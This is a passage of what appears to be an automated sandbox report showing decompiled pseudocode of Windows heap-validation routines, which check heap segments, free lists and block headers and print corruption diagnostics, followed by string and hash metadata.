                                      				signed int _t281;
                                      				signed int _t283;
                                      				intOrPtr _t284;
                                      				signed int _t288;
                                      				signed int* _t294;
                                      				signed int* _t298;
                                      				intOrPtr* _t299;
                                      				intOrPtr* _t300;
                                      				signed int _t307;
                                      				signed int _t309;
                                      				signed short _t312;
                                      				signed short _t315;
                                      				signed int _t317;
                                      				signed int _t320;
                                      				signed int _t322;
                                      				signed int _t326;
                                      				signed int _t327;
                                      				void* _t328;
                                      				signed int _t332;
                                      				signed int _t340;
                                      				signed int _t342;
                                      				signed char _t344;
                                      				signed int* _t345;
                                      				void* _t346;
                                      				signed char _t352;
                                      				signed char _t367;
                                      				signed int _t374;
                                      				intOrPtr* _t378;
                                      				signed int _t380;
                                      				signed int _t385;
                                      				signed char _t390;
                                      				unsigned int _t392;
                                      				signed char _t395;
                                      				unsigned int _t397;
                                      				intOrPtr* _t400;
                                      				signed int _t402;
                                      				signed int _t405;
                                      				intOrPtr* _t406;
                                      				signed int _t407;
                                      				intOrPtr _t412;
                                      				void* _t414;
                                      				signed int _t415;
                                      				signed int _t416;
                                      				signed int _t429;
                                      
                                      				_v16 = _v16 & 0x00000000;
                                      				_t189 = 0;
                                      				_v8 = _v8 & 0;
                                      				_t332 = __edx;
                                      				_v12 = 0;
                                      				_t414 = __ecx;
                                      				_t415 = __edx;
                                      				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                      					L88:
                                      					_t416 = _v16;
                                      					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                      						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                      						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                      							L107:
                                      							return 1;
                                      						}
                                      						_t191 =  *[fs:0x30];
                                      						__eflags =  *(_t191 + 0xc);
                                      						if( *(_t191 + 0xc) == 0) {
                                      							_push("HEAP: ");
                                      							E0197B150();
                                      						} else {
                                      							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      						}
                                      						_push(_v12);
                                      						_push( *((intOrPtr*)(_t332 + 0x30)));
                                      						_push(_t332);
                                      						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                      						L122:
                                      						E0197B150();
                                      						L119:
                                      						return 0;
                                      					}
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push("HEAP: ");
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					_push(_t416);
                                      					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                      					_push(_t332);
                                      					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                      					goto L122;
                                      				} else {
                                      					goto L1;
                                      				}
                                      				do {
                                      					L1:
                                      					 *_a16 = _t415;
                                      					if( *(_t414 + 0x4c) != 0) {
                                      						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                      						 *_t415 = _t392;
                                      						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                      						_t424 = _t392 >> 0x18 - _t352;
                                      						if(_t392 >> 0x18 != _t352) {
                                      							_push(_t352);
                                      							E01A2FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                      						}
                                      					}
                                      					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                      						_t210 =  *[fs:0x30];
                                      						__eflags =  *(_t210 + 0xc);
                                      						if( *(_t210 + 0xc) == 0) {
                                      							_push("HEAP: ");
                                      							E0197B150();
                                      						} else {
                                      							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      						}
                                      						_push(_v8 & 0x0000ffff);
                                      						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                      						__eflags = _t340;
                                      						_push(_t340);
                                      						E0197B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                      						L117:
                                      						__eflags =  *(_t414 + 0x4c);
                                      						if( *(_t414 + 0x4c) != 0) {
                                      							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                      							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      							__eflags =  *_t415;
                                      						}
                                      						goto L119;
                                      					}
                                      					_t225 =  *_t415 & 0x0000ffff;
                                      					_t390 =  *(_t415 + 2);
                                      					_t342 = _t225;
                                      					_v8 = _t342;
                                      					_v20 = _t342;
                                      					_v28 = _t225 << 3;
                                      					if((_t390 & 0x00000001) == 0) {
                                      						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                      						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                      						__eflags = _t344 & 0x00000001;
                                      						if((_t344 & 0x00000001) == 0) {
                                      							L66:
                                      							_t345 = _a12;
                                      							 *_a8 =  *_a8 + 1;
                                      							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                      							__eflags =  *_t345;
                                      							L67:
                                      							_t231 =  *(_t415 + 6);
                                      							if(_t231 == 0) {
                                      								_t346 = _t414;
                                      							} else {
                                      								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                      							}
                                      							if(_t346 != _t332) {
                                      								_t232 =  *[fs:0x30];
                                      								__eflags =  *(_t232 + 0xc);
                                      								if( *(_t232 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push( *(_t415 + 6) & 0x000000ff);
                                      								_push(_t415);
                                      								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                      								goto L95;
                                      							} else {
                                      								if( *((char*)(_t415 + 7)) != 3) {
                                      									__eflags =  *(_t414 + 0x4c);
                                      									if( *(_t414 + 0x4c) != 0) {
                                      										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                      										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      										__eflags =  *_t415;
                                      									}
                                      									_t415 = _t415 + _v28;
                                      									__eflags = _t415;
                                      									goto L86;
                                      								}
                                      								_t245 =  *(_t415 + 0x1c);
                                      								if(_t245 == 0) {
                                      									_t395 =  *_t415 & 0x0000ffff;
                                      									_v6 = _t395 >> 8;
                                      									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                      									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                      										__eflags =  *(_t414 + 0x4c);
                                      										if( *(_t414 + 0x4c) != 0) {
                                      											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                      											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      											__eflags =  *_t415;
                                      										}
                                      										goto L107;
                                      									}
                                      									_t249 =  *[fs:0x30];
                                      									__eflags =  *(_t249 + 0xc);
                                      									if( *(_t249 + 0xc) == 0) {
                                      										_push("HEAP: ");
                                      										E0197B150();
                                      									} else {
                                      										E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      									}
                                      									_push( *((intOrPtr*)(_t332 + 0x28)));
                                      									_push(_t415);
                                      									_push("Heap block at %p is not last block in segment (%p)\n");
                                      									L95:
                                      									E0197B150();
                                      									goto L117;
                                      								}
                                      								_v12 = _v12 + 1;
                                      								_v16 = _v16 + (_t245 >> 0xc);
                                      								if( *(_t414 + 0x4c) != 0) {
                                      									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                      									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      								}
                                      								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                      								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                      									L82:
                                      									_v8 = _v8 & 0x00000000;
                                      									goto L86;
                                      								} else {
                                      									if( *(_t414 + 0x4c) != 0) {
                                      										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                      										 *_t415 = _t397;
                                      										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                      										_t442 = _t397 >> 0x18 - _t367;
                                      										if(_t397 >> 0x18 != _t367) {
                                      											_push(_t367);
                                      											E01A2FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                      										}
                                      									}
                                      									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                      										_t259 =  *[fs:0x30];
                                      										__eflags =  *(_t259 + 0xc);
                                      										if( *(_t259 + 0xc) == 0) {
                                      											_push("HEAP: ");
                                      											E0197B150();
                                      										} else {
                                      											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      										}
                                      										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                      										_push(_t415);
                                      										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                      										goto L95;
                                      									} else {
                                      										if( *(_t414 + 0x4c) != 0) {
                                      											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                      											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      										}
                                      										goto L82;
                                      									}
                                      								}
                                      							}
                                      						}
                                      						_t281 = _v28 + 0xfffffff0;
                                      						_v24 = _t281;
                                      						__eflags = _t390 & 0x00000002;
                                      						if((_t390 & 0x00000002) != 0) {
                                      							__eflags = _t281 - 4;
                                      							if(_t281 > 4) {
                                      								_t281 = _t281 - 4;
                                      								__eflags = _t281;
                                      								_v24 = _t281;
                                      							}
                                      						}
                                      						__eflags = _t390 & 0x00000008;
                                      						if((_t390 & 0x00000008) == 0) {
                                      							_t102 = _t415 + 0x10; // -8
                                      							_t283 = E019CD540(_t102, _t281, 0xfeeefeee);
                                      							_v20 = _t283;
                                      							__eflags = _t283 - _v24;
                                      							if(_t283 != _v24) {
                                      								_t284 =  *[fs:0x30];
                                      								__eflags =  *(_t284 + 0xc);
                                      								if( *(_t284 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_t288 = _v20 + 8 + _t415;
                                      								__eflags = _t288;
                                      								_push(_t288);
                                      								_push(_t415);
                                      								_push("Free Heap block %p modified at %p after it was freed\n");
                                      								goto L95;
                                      							}
                                      							goto L66;
                                      						} else {
                                      							_t374 =  *(_t415 + 8);
                                      							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                      							_v24 = _t374;
                                      							_v28 = _t400;
                                      							_t294 =  *(_t374 + 4);
                                      							__eflags =  *_t400 - _t294;
                                      							if( *_t400 != _t294) {
                                      								L64:
                                      								_push(_t374);
                                      								_push( *_t400);
                                      								_t101 = _t415 + 8; // -16
                                      								E01A3A80D(_t414, 0xd, _t101, _t294);
                                      								goto L86;
                                      							}
                                      							_t56 = _t415 + 8; // -16
                                      							__eflags =  *_t400 - _t56;
                                      							_t374 = _v24;
                                      							if( *_t400 != _t56) {
                                      								goto L64;
                                      							}
                                      							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                      							_t402 =  *(_t414 + 0xb4);
                                      							__eflags = _t402;
                                      							if(_t402 == 0) {
                                      								L35:
                                      								_t298 = _v28;
                                      								 *_t298 = _t374;
                                      								 *(_t374 + 4) = _t298;
                                      								__eflags =  *(_t415 + 2) & 0x00000008;
                                      								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                      									L39:
                                      									_t377 =  *_t415 & 0x0000ffff;
                                      									_t299 = _t414 + 0xc0;
                                      									_v28 =  *_t415 & 0x0000ffff;
                                      									 *(_t415 + 2) = 0;
                                      									 *((char*)(_t415 + 7)) = 0;
                                      									__eflags =  *(_t414 + 0xb4);
                                      									if( *(_t414 + 0xb4) == 0) {
                                      										_t378 =  *_t299;
                                      									} else {
                                      										_t378 = E0199E12C(_t414, _t377);
                                      										_t299 = _t414 + 0xc0;
                                      									}
                                      									__eflags = _t299 - _t378;
                                      									if(_t299 == _t378) {
                                      										L51:
                                      										_t300 =  *((intOrPtr*)(_t378 + 4));
                                      										__eflags =  *_t300 - _t378;
                                      										if( *_t300 != _t378) {
                                      											_push(_t378);
                                      											_push( *_t300);
                                      											__eflags = 0;
                                      											E01A3A80D(0, 0xd, _t378, 0);
                                      										} else {
                                      											_t87 = _t415 + 8; // -16
                                      											_t406 = _t87;
                                      											 *_t406 = _t378;
                                      											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                      											 *_t300 = _t406;
                                      											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                      										}
                                      										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                      										_t405 =  *(_t414 + 0xb4);
                                      										__eflags = _t405;
                                      										if(_t405 == 0) {
                                      											L61:
                                      											__eflags =  *(_t414 + 0x4c);
                                      											if(__eflags != 0) {
                                      												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                      												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                      											}
                                      											goto L86;
                                      										} else {
                                      											_t380 =  *_t415 & 0x0000ffff;
                                      											while(1) {
                                      												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                      												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                      													break;
                                      												}
                                      												_t307 =  *_t405;
                                      												__eflags = _t307;
                                      												if(_t307 == 0) {
                                      													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                      													L60:
                                      													_t94 = _t415 + 8; // -16
                                      													E0199E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                      													goto L61;
                                      												}
                                      												_t405 = _t307;
                                      											}
                                      											_t309 = _t380;
                                      											goto L60;
                                      										}
                                      									} else {
                                      										_t407 =  *(_t414 + 0x4c);
                                      										while(1) {
                                      											__eflags = _t407;
                                      											if(_t407 == 0) {
                                      												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                      											} else {
                                      												_t315 =  *(_t378 - 8);
                                      												_t407 =  *(_t414 + 0x4c);
                                      												__eflags = _t315 & _t407;
                                      												if((_t315 & _t407) != 0) {
                                      													_t315 = _t315 ^  *(_t414 + 0x50);
                                      													__eflags = _t315;
                                      												}
                                      												_t312 = _t315 & 0x0000ffff;
                                      											}
                                      											__eflags = _v28 - (_t312 & 0x0000ffff);
                                      											if(_v28 <= (_t312 & 0x0000ffff)) {
                                      												goto L51;
                                      											}
                                      											_t378 =  *_t378;
                                      											__eflags = _t414 + 0xc0 - _t378;
                                      											if(_t414 + 0xc0 != _t378) {
                                      												continue;
                                      											}
                                      											goto L51;
                                      										}
                                      										goto L51;
                                      									}
                                      								}
                                      								_t317 = E0199A229(_t414, _t415);
                                      								__eflags = _t317;
                                      								if(_t317 != 0) {
                                      									goto L39;
                                      								}
                                      								E0199A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                      								goto L86;
                                      							}
                                      							_t385 =  *_t415 & 0x0000ffff;
                                      							while(1) {
                                      								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                      								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                      									break;
                                      								}
                                      								_t320 =  *_t402;
                                      								__eflags = _t320;
                                      								if(_t320 == 0) {
                                      									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                      									L34:
                                      									_t63 = _t415 + 8; // -16
                                      									E0199BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                      									_t374 = _v24;
                                      									goto L35;
                                      								}
                                      								_t402 = _t320;
                                      							}
                                      							_t322 = _t385;
                                      							goto L34;
                                      						}
                                      					}
                                      					if(_a20 == 0) {
                                      						L18:
                                      						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                      							goto L67;
                                      						}
                                      						if(E01A223E3(_t414, _t415) == 0) {
                                      							goto L117;
                                      						}
                                      						goto L67;
                                      					} else {
                                      						if((_t390 & 0x00000002) == 0) {
                                      							_t326 =  *(_t415 + 3) & 0x000000ff;
                                      						} else {
                                      							_t328 = E01971F5B(_t415);
                                      							_t342 = _v20;
                                      							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                      						}
                                      						_t429 = _t326;
                                      						if(_t429 == 0) {
                                      							goto L18;
                                      						}
                                      						if(_t429 >= 0) {
                                      							__eflags = _t326 & 0x00000800;
                                      							if(__eflags != 0) {
                                      								goto L18;
                                      							}
                                      							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                      							if(__eflags >= 0) {
                                      								goto L18;
                                      							}
                                      							_t412 = _a20;
                                      							_t327 = _t326 & 0x0000ffff;
                                      							L17:
                                      							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                      							goto L18;
                                      						}
                                      						_t327 = _t326 & 0x00007fff;
                                      						if(_t327 >= 0x81) {
                                      							goto L18;
                                      						}
                                      						_t412 = _a24;
                                      						goto L17;
                                      					}
                                      					L86:
                                      				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                      				_t189 = _v12;
                                      				goto L88;
                                      			}
                                      0x00000000
                                      0x00000000
                                      0x01a34b77
                                      0x01a34b7a
                                      0x01a34b8c
                                      0x01a34b7c
                                      0x01a34b7e
                                      0x01a34b83
                                      0x01a34b86
                                      0x01a34b86
                                      0x01a34b90
                                      0x01a34b93
                                      0x00000000
                                      0x00000000
                                      0x01a34b95
                                      0x01a34bab
                                      0x01a34bb0
                                      0x00000000
                                      0x00000000
                                      0x01a34bb2
                                      0x01a34bb9
                                      0x00000000
                                      0x00000000
                                      0x01a34bbb
                                      0x01a34bbe
                                      0x01a34bc1
                                      0x01a34bc1
                                      0x00000000
                                      0x01a34bc1
                                      0x01a34b97
                                      0x01a34ba4
                                      0x00000000
                                      0x00000000
                                      0x01a34ba6
                                      0x00000000
                                      0x01a34ba6
                                      0x01a34ea9
                                      0x01a34ea9
                                      0x01a34eb2
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                      • API String ID: 0-3591852110
                                      • Opcode ID: b84a87bc3127e9169e34954de14f6cbe4110d4e9a8e99befbeb3653e0a6b13cc
                                      • Instruction ID: 00452f87c4f1cdd307f747d05e01640203a996714f69f1e5312b3e2453fdeed8
                                      • Opcode Fuzzy Hash: b84a87bc3127e9169e34954de14f6cbe4110d4e9a8e99befbeb3653e0a6b13cc
                                      • Instruction Fuzzy Hash: 1F12D1706046429FDB25CF6DC495BBABBF5FF89714F188459F48A8B641D734E880CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 56%
                                      			E01A34496(signed int* __ecx, void* __edx) {
                                      				signed int _v5;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed char _v24;
                                      				signed int* _v28;
                                      				char _v32;
                                      				signed int* _v36;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				void* _t150;
                                      				intOrPtr _t151;
                                      				signed char _t156;
                                      				intOrPtr _t157;
                                      				unsigned int _t169;
                                      				intOrPtr _t170;
                                      				signed int* _t183;
                                      				signed char _t184;
                                      				intOrPtr _t191;
                                      				signed int _t201;
                                      				intOrPtr _t203;
                                      				intOrPtr _t212;
                                      				intOrPtr _t220;
                                      				signed int _t230;
                                      				signed int _t241;
                                      				signed int _t244;
                                      				void* _t259;
                                      				signed int _t260;
                                      				signed int* _t261;
                                      				intOrPtr* _t262;
                                      				signed int _t263;
                                      				signed int* _t264;
                                      				signed int _t267;
                                      				signed int* _t268;
                                      				void* _t270;
                                      				void* _t281;
                                      				signed short _t285;
                                      				signed short _t289;
                                      				signed int _t291;
                                      				signed int _t298;
                                      				signed char _t303;
                                      				signed char _t308;
                                      				signed int _t314;
                                      				intOrPtr _t317;
                                      				unsigned int _t319;
                                      				signed int* _t325;
                                      				signed int _t326;
                                      				signed int _t327;
                                      				intOrPtr _t328;
                                      				signed int _t329;
                                      				signed int _t330;
                                      				signed int* _t331;
                                      				signed int _t332;
                                      				signed int _t350;
                                      
                                      				_t259 = __edx;
                                      				_t331 = __ecx;
                                      				_v28 = __ecx;
                                      				_v20 = 0;
                                      				_v12 = 0;
                                      				_t150 = E01A349A4(__ecx);
                                      				_t267 = 1;
                                      				if(_t150 == 0) {
                                      					L61:
                                      					_t151 =  *[fs:0x30];
                                      					__eflags =  *((char*)(_t151 + 2));
                                      					if( *((char*)(_t151 + 2)) != 0) {
                                      						 *0x1a66378 = _t267;
                                      						asm("int3");
                                      						 *0x1a66378 = 0;
                                      					}
                                      					__eflags = _v12;
                                      					if(_v12 != 0) {
                                      						_t105 =  &_v16;
                                      						 *_t105 = _v16 & 0x00000000;
                                      						__eflags =  *_t105;
                                      						E019A174B( &_v12,  &_v16, 0x8000);
                                      					}
                                      					L65:
                                      					__eflags = 0;
                                      					return 0;
                                      				}
                                      				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                      					_t268 =  &(_t331[0x30]);
                                      					_v32 = 0;
                                      					_t260 =  *_t268;
                                      					_t308 = 0;
                                      					_v24 = 0;
                                      					while(_t268 != _t260) {
                                      						_t260 =  *_t260;
                                      						_v16 =  *_t325 & 0x0000ffff;
                                      						_t156 = _t325[0];
                                      						_v28 = _t325;
                                      						_v5 = _t156;
                                      						__eflags = _t156 & 0x00000001;
                                      						if((_t156 & 0x00000001) != 0) {
                                      							_t157 =  *[fs:0x30];
                                      							__eflags =  *(_t157 + 0xc);
                                      							if( *(_t157 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							_push(_t325);
                                      							E0197B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                      							L32:
                                      							_t270 = 0;
                                      							__eflags = _t331[0x13];
                                      							if(_t331[0x13] != 0) {
                                      								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                      								 *_t325 =  *_t325 ^ _t331[0x14];
                                      							}
                                      							L60:
                                      							_t267 = _t270 + 1;
                                      							__eflags = _t267;
                                      							goto L61;
                                      						}
                                      						_t169 =  *_t325 & 0x0000ffff;
                                      						__eflags = _t169 - _t308;
                                      						if(_t169 < _t308) {
                                      							_t170 =  *[fs:0x30];
                                      							__eflags =  *(_t170 + 0xc);
                                      							if( *(_t170 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
                                      								E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      							}
                                      							E0197B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                      							goto L32;
                                      						} else {
                                      							__eflags = _t331[0x13];
                                      							_t308 = _t169;
                                      							_v24 = _t308;
                                      							if(_t331[0x13] != 0) {
                                      								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                      								 *_t325 =  *_t325 ^ _t331[0x14];
                                      								__eflags =  *_t325;
                                      							}
                                      							_t26 =  &_v32;
                                      							 *_t26 = _v32 + 1;
                                      							__eflags =  *_t26;
                                      							continue;
                                      						}
                                      					}
                                      					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                      					if( *0x1a66350 != 0 && _t331[0x2f] != 0) {
                                      						_push(4);
                                      						_push(0x1000);
                                      						_push( &_v16);
                                      						_push(0);
                                      						_push( &_v12);
                                      						_push(0xffffffff);
                                      						if(E019B9660() >= 0) {
                                      							_v20 = _v12 + 0x204;
                                      						}
                                      					}
                                      					_t183 =  &(_t331[0x27]);
                                      					_t281 = 0x81;
                                      					_t326 =  *_t183;
                                      					if(_t183 == _t326) {
                                      						L49:
                                      						_t261 =  &(_t331[0x29]);
                                      						_t184 = 0;
                                      						_t327 =  *_t261;
                                      						_t282 = 0;
                                      						_v24 = 0;
                                      						_v36 = 0;
                                      						__eflags = _t327 - _t261;
                                      						if(_t327 == _t261) {
                                      							L53:
                                      							_t328 = _v32;
                                      							_v28 = _t331;
                                      							__eflags = _t328 - _t184;
                                      							if(_t328 == _t184) {
                                      								__eflags = _t331[0x1d] - _t282;
                                      								if(_t331[0x1d] == _t282) {
                                      									__eflags = _v12;
                                      									if(_v12 == 0) {
                                      										L82:
                                      										_t267 = 1;
                                      										__eflags = 1;
                                      										goto L83;
                                      									}
                                      									_t329 = _t331[0x2f];
                                      									__eflags = _t329;
                                      									if(_t329 == 0) {
                                      										L77:
                                      										_t330 = _t331[0x22];
                                      										__eflags = _t330;
                                      										if(_t330 == 0) {
                                      											L81:
                                      											_t129 =  &_v16;
                                      											 *_t129 = _v16 & 0x00000000;
                                      											__eflags =  *_t129;
                                      											E019A174B( &_v12,  &_v16, 0x8000);
                                      											goto L82;
                                      										}
                                      										_t314 = _t331[0x21] & 0x0000ffff;
                                      										_t285 = 1;
                                      										__eflags = 1 - _t314;
                                      										if(1 >= _t314) {
                                      											goto L81;
                                      										} else {
                                      											goto L79;
                                      										}
                                      										while(1) {
                                      											L79:
                                      											_t330 = _t330 + 0x40;
                                      											_t332 = _t285 & 0x0000ffff;
                                      											_t262 = _v20 + _t332 * 4;
                                      											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                      											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                      												break;
                                      											}
                                      											_t285 = _t285 + 1;
                                      											__eflags = _t285 - _t314;
                                      											if(_t285 < _t314) {
                                      												continue;
                                      											}
                                      											goto L81;
                                      										}
                                      										_t191 =  *[fs:0x30];
                                      										__eflags =  *(_t191 + 0xc);
                                      										if( *(_t191 + 0xc) == 0) {
                                      											_push("HEAP: ");
                                      											E0197B150();
                                      										} else {
                                      											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      										}
                                      										_push(_t262);
                                      										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                      										_t148 = _t330 + 0x10; // 0x10
                                      										_push( *((intOrPtr*)(_t330 + 8)));
                                      										E0197B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                      										L59:
                                      										_t270 = 0;
                                      										__eflags = 0;
                                      										goto L60;
                                      									}
                                      									_t289 = 1;
                                      									__eflags = 1;
                                      									while(1) {
                                      										_t201 = _v12;
                                      										_t329 = _t329 + 0xc;
                                      										_t263 = _t289 & 0x0000ffff;
                                      										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                      										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                      											break;
                                      										}
                                      										_t289 = _t289 + 1;
                                      										__eflags = _t289 - 0x81;
                                      										if(_t289 < 0x81) {
                                      											continue;
                                      										}
                                      										goto L77;
                                      									}
                                      									_t203 =  *[fs:0x30];
                                      									__eflags =  *(_t203 + 0xc);
                                      									if( *(_t203 + 0xc) == 0) {
                                      										_push("HEAP: ");
                                      										E0197B150();
                                      									} else {
                                      										E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      									}
                                      									_t291 = _v12;
                                      									_push(_t291 + _t263 * 4);
                                      									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                      									_push( *((intOrPtr*)(_t329 + 8)));
                                      									E0197B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                      									goto L59;
                                      								}
                                      								_t212 =  *[fs:0x30];
                                      								__eflags =  *(_t212 + 0xc);
                                      								if( *(_t212 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push(_t331[0x1d]);
                                      								_push(_v36);
                                      								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                      								L58:
                                      								E0197B150();
                                      								goto L59;
                                      							}
                                      							_t220 =  *[fs:0x30];
                                      							__eflags =  *(_t220 + 0xc);
                                      							if( *(_t220 + 0xc) == 0) {
                                      								_push("HEAP: ");
                                      								E0197B150();
                                      							} else {
